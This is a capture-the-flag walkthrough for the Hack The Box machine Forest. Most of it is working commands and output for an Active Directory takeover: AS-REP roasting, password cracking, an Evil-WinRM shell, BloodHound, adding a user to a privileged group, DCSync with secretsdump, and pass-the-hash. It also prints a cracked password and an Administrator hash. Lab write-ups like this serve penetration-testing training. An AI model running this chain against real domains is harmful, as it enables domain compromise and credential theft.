Forest is an awesome Windows-based machine; its difficulty is set to “Easy” and the user score is 4.6.
This machine is all about Active Directory exploitation.
Enumeration
Start with nmap scan:
nmap -sS -sV -p- 10.10.10.161
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Continue with enum4linux (forest.htb needs an /etc/hosts entry for 10.10.10.161, or just pass the IP):
enum4linux -a forest.htb
The output is massive, but it contains some useful information:
FOREST.htb.local is the domain controller
EXCH01.htb.local is an Exchange server
Users: sebastian, santi, andy, lucinda, mark and svc-alfresco
Exploitation
AS-REP Roasting is an attack against Kerberos user accounts that do not require pre-authentication. With pre-authentication, the client encrypts a timestamp with a key derived from the user's password and sends it in the AS-REQ; the KDC decrypts it to confirm that the right password was used and that the request is not a replay of an earlier one. If an account is configured with "Do not require Kerberos preauthentication", anyone can send an AS-REQ for it and receive an AS-REP. Part of that response is encrypted with the user's key (for RC4-HMAC, the NT hash of the password), so it can be cracked offline: derive a key from each candidate password and check whether the encrypted part decrypts with a valid checksum. Impacket's GetNPUsers.py automates the request; feed it the user list from enum4linux as users.txt:
GetNPUsers.py htb.local/ -usersfile users.txt -format john -dc-ip 10.10.10.161
We get a hash for the service account svc-alfresco; now it is time to crack it with john:
john --wordlist=./rockyou.txt hash.txt
The password is s3rvice.
As we saw in the nmap results, port 5985 is open; that is Windows Remote Management (WinRM), so we can use Evil-WinRM to get a shell:
evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161 -s 'BloodHound/Ingestors/'
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
The -s flag points Evil-WinRM at a local directory of PowerShell scripts that can then be loaded into the session by name; -e does the same for .exe files (to run mimikatz, for example). That flag will help in the Privilege Escalation phase.
Privilege Escalation
User svc-alfresco does not have write permissions here, but because we started Evil-WinRM with -s we do not need to upload anything: the ingestor is loaded straight from our machine. The function SharpHound.ps1 exposes is Invoke-BloodHound; menu lists the loaded functions if you want to check the name:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-BloodHound -CollectionMethod All
Evil-WinRM also has a built-in download command for fetching the .zip that SharpHound produces:
download remote_filename (or download remote_filename destination_filename to choose the local name)
Run BloodHound and drag-and-drop the SharpHound .zip into it. Now we have a valid path for privilege escalation to Domain Admin: svc-alfresco is a member of Account Operators, which can create new accounts and add them to groups that are not protected by AdminSDHolder, and Exchange Windows Permissions is such a group. Its members hold WriteDacl on the domain object, and that is the right that lets us grant ourselves DCSync.
Creating a new user. As Evil-WinRM runs PowerShell by default, we can use either the CMD way or the PowerShell way:
net user z3v5 p@ssw0rd /domain /add
net group "Exchange Windows Permissions" z3v5 /domain /add
OR
$pass = ConvertTo-SecureString "p@ssw0rd" -AsPlainText -Force
New-ADUser z3v5 -AccountPassword $pass -Enabled $True
Add-ADGroupMember -Identity "Exchange Windows Permissions" -members z3v5
New user z3v5 is now a member of Exchange Windows Permissions, so it has WriteDacl on the domain object. Membership alone does not give replication rights: the account must first use WriteDacl to grant itself the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain (PowerView's Add-DomainObjectAcl with -Rights DCSync does exactly this). After that it can perform a DCSync attack. The DCSync right lets an attacker simulate the behaviour of a Domain Controller, and the attack has two stages:
Discover the Domain Controller in the provided domain
Request the Domain Controller to replicate the user credentials
To automate that we can use secretsdump.py from Impacket:
secretsdump.py htb.local/z3v5:p@ssw0rd@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
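The reason the extra ACL step matters is easiest to see by evaluating the domain DACL the way BloodHound does when it draws WriteDacl and DCSync edges. The following is an added example, not part of the writeup, BloodHound or PowerView: it models a constructed DACL and membership table for htb.local (group names follow the writeup; the ACEs and the nesting are made up, the two extended-right GUIDs are the real schema values), then replays the path, showing that z3v5 gains WriteDacl on joining Exchange Windows Permissions but only qualifies for DCSync after the two replication ACEs are added.

```python
"""Why Exchange Windows Permissions membership is one hop short of DCSync.

Added example; not part of the writeup, BloodHound or PowerView. Models the
htb.local domain object's DACL, evaluates it the way BloodHound derives
WriteDacl and DCSync edges, and replays the escalation from the text. The
ACEs and membership table are constructed; the GUIDs are real schema values."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
DACL_WRITERS = {"WriteDacl", "WriteOwner", "GenericAll"}  # rights that let you rewrite the DACL


@dataclass
class Ace:
    trustee: str                                   # group or user name, standing in for a SID
    rights: Set[str] = field(default_factory=set)  # e.g. {"WriteDacl"} or {"ExtendedRight"}
    object_type: Optional[str] = None              # extended-right GUID for ExtendedRight ACEs


@dataclass
class Domain:
    dacl: List[Ace]
    members: Dict[str, Set[str]]  # group -> direct members (users or groups)

    def groups_of(self, principal: str) -> Set[str]:
        """Transitive membership, the way BloodHound chains MemberOf edges."""
        found, queue = set(), [principal]
        while queue:
            p = queue.pop()
            for group, direct in self.members.items():
                if p in direct and group not in found:
                    found.add(group)
                    queue.append(group)
        return found

    def rights_of(self, principal: str) -> Set[Tuple[str, Optional[str]]]:
        """Effective (right, object_type) pairs on the domain object."""
        trustees = self.groups_of(principal) | {principal}
        return {(r, ace.object_type) for ace in self.dacl
                if ace.trustee in trustees for r in ace.rights}

    def can_write_dacl(self, principal: str) -> bool:
        return any(r in DACL_WRITERS for r, _ in self.rights_of(principal))

    def can_dcsync(self, principal: str) -> bool:
        """BloodHound draws DCSync only for GenericAll or for BOTH replication rights."""
        rights = self.rights_of(principal)
        if ("GenericAll", None) in rights:
            return True
        return {("ExtendedRight", GET_CHANGES), ("ExtendedRight", GET_CHANGES_ALL)} <= rights

    def grant_dcsync(self, actor: str, target: str) -> None:
        """What Add-DomainObjectAcl -Rights DCSync does, gated on the actor's WriteDacl."""
        if not self.can_write_dacl(actor):
            raise PermissionError(f"{actor} cannot modify the domain DACL")
        self.dacl.append(Ace(target, {"ExtendedRight"}, GET_CHANGES))
        self.dacl.append(Ace(target, {"ExtendedRight"}, GET_CHANGES_ALL))


def forest_like_domain() -> Domain:
    """Constructed state after the AS-REP step; group names follow the writeup."""
    dacl = [
        Ace("Domain Admins", {"GenericAll"}),
        Ace("Domain Controllers", {"ExtendedRight"}, GET_CHANGES),
        Ace("Domain Controllers", {"ExtendedRight"}, GET_CHANGES_ALL),
        Ace("Exchange Windows Permissions", {"WriteDacl"}),
    ]
    members = {"Account Operators": {"svc-alfresco"}, "Exchange Windows Permissions": set()}
    return Domain(dacl, members)


def replay_forest_path(domain: Domain, new_user: str = "z3v5") -> List[Tuple[bool, bool]]:
    """(can_write_dacl, can_dcsync) for new_user after each step of the escalation."""
    trace = []
    # Step 1: as Account Operators, create the user and put it in a non-protected group.
    assert "Account Operators" in domain.groups_of("svc-alfresco")
    domain.members["Exchange Windows Permissions"].add(new_user)
    trace.append((domain.can_write_dacl(new_user), domain.can_dcsync(new_user)))
    # Step 2: spend WriteDacl on two ACEs for ourselves; only now would DRSUAPI replication succeed.
    domain.grant_dcsync(new_user, new_user)
    trace.append((domain.can_write_dacl(new_user), domain.can_dcsync(new_user)))
    return trace


if __name__ == "__main__":
    print(replay_forest_path(forest_like_domain()))  # [(True, False), (True, True)]
```

The same evaluation is what a defender should run in reverse: any principal outside Domain Controllers and the built-in admin groups that holds WriteDacl, WriteOwner or GenericAll on the domain object is one ACE edit away from DCSync, so those rights deserve the same alerting as the replication rights themselves.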
There are plenty of options for what to do with the Administrator account's NT hash; I chose to pass the hash with Evil-WinRM, whose -H flag takes only the NT half (the aad3b435... prefix is the empty LM hash and is not needed):
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator